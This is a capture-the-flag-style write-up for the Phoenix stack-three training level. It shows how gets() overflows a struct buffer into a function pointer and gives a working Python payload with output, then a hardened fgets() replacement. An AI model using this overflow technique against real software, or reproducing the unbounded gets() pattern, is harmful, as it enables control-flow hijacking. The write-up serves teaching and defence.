Exploit Education | Phoenix | Stack Three Solution

Stack Three

The description and source code can be found here:
https://exploit.education/phoenix/stack-three/

This time the target is a function pointer stored on the stack, directly after the input buffer in the same struct. We need to get the program to call the complete_level() function:

void complete_level() {
    printf("Congratulations, you've finished " LEVELNAME " :-) Well done!\n");
    exit(0);
}

The program sets the "fp" member to NULL, reads a line of user input into "buffer" with gets() (which performs no length check), and then, if "fp" is no longer NULL, calls whatever it now points to as if it were a function:

struct {
    char buffer[64];          /* filled by gets() with no bound */
    volatile int (*fp)();     /* sits immediately after the buffer */
} locals;

printf("%s\n", BANNER);

locals.fp = NULL;
gets(locals.buffer);

if (locals.fp) {
    printf("calling function pointer @ %p\n", locals.fp);
    fflush(stdout);
    locals.fp();
    ...

We can use objdump to get the address of the complete_level() function:

user@phoenix-amd64:/opt/phoenix/amd64$ objdump -d stack-three | grep complete_level
000000000040069d <complete_level>:

So we should be able to put 0x40069d into the "fp" pointer to get that function called. Sixty-four bytes fill the buffer, the next three bytes land in "fp" as the little-endian encoding of 0x40069d, and the remaining pointer bytes are already zero because "fp" was initialized to NULL:

user@phoenix-amd64:/opt/phoenix/amd64$ python -c 'print "A"*64 + "\x9d\x06\x40"' | ./stack-three
Welcome to phoenix/stack-three, brought to you by https://exploit.education
calling function pointer @ 0x40069d
Congratulations, you've finished phoenix/stack-three :-) Well done!
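As an added illustration that is not part of the original write-up, the struct below mirrors the level's locals layout and replaces gets() with a bounded fgets() read, so even an over-long line cannot reach the pointer; the struct name, the function names and the constructed input are mine, not from the Phoenix sources.

```c
#define _POSIX_C_SOURCE 200809L
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Same layout as the level's locals struct: 64-byte buffer, then fp.
   Because fp follows the buffer directly, an unbounded write into
   buffer runs straight into the pointer. */
struct level_locals {
    char buffer[64];
    volatile int (*fp)(void);
};

/* Offset of fp from the start of the struct (64 on amd64): the 65th
   input byte is the first byte of the pointer. */
size_t fp_offset(void) {
    return offsetof(struct level_locals, fp);
}

/* Hardened replacement for gets(): reads at most sizeof(buffer)-1 bytes,
   always NUL-terminates, and strips the trailing newline. */
int read_line_bounded(struct level_locals *l, FILE *in) {
    if (fgets(l->buffer, sizeof l->buffer, in) == NULL)
        return -1;
    l->buffer[strcspn(l->buffer, "\n")] = '\0';
    return 0;
}

/* Feed a constructed input line through the hardened reader.
   Returns 1 if fp is still NULL afterwards, 0 if it was overwritten,
   -1 on error; *stored_len receives the length kept in buffer. */
int feed_input(const char *input, size_t *stored_len) {
    struct level_locals l;
    char copy[256];
    memset(&l, 0, sizeof l);
    l.fp = NULL;
    snprintf(copy, sizeof copy, "%s", input);
    FILE *in = fmemopen(copy, strlen(copy), "r");
    if (in == NULL)
        return -1;
    int rc = read_line_bounded(&l, in);
    fclose(in);
    if (rc != 0)
        return -1;
    *stored_len = strlen(l.buffer);
    return l.fp == NULL;
}
```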
